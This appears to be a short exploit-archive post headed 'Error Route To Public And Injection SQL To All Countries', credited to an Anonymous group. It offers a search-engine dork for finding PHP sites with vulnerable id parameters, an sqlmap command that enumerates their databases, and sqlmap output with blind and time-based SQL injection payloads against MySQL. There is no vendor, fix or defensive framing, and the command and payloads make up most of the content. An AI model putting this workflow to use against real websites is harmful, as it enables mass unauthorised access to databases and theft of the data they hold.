Error Route To Public And Injection SQL To All Countries

2017.08.01

Informacion - Anonymous (CO)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: inurl:.php?id=+intext:/var/www/vhosts/+site:net

--- Fecha: 1/28/2017
--- W10
--- Sqlmap -u "http://www.site.net/?id=[SQL]" --random-agent --dbs
======= Parameter: ID (GET)
    ======= Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID=3847') AND 1270=1270 AND ('oYoI'='oYoI

    ======= Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: ID=3847') AND SLEEP(5) AND ('zTNz'='zTNz
---
======= [03:27:40] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Apache
======= back-end DBMS: MySQL >= 5.0.12

References:

https://www.facebook.com/Informacion-Anonymous-611394289006994/

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}